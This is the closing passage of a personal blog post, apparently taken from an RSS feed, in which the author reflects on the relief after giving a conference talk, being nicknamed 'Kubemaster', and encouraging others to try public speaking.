<p>Once it was done, like the second after, I felt a huge relief. I won't watch it for a little while just to make sure I don't judge my cringy talk too harshly. Later I got to meet some really cool people and became known as the Kubemaster (definitely need a less praiseworthy handle). It was a great experience and I would encourage anyone who has not done something like this to give it a shot. Anyone reading this probably has better ideas. If anyone has made it this far, I hope to have the chance to do it again, but that will require some original thoughts. Back at you Red Bull Racing.</p>
]]></content:encoded></item></channel></rss>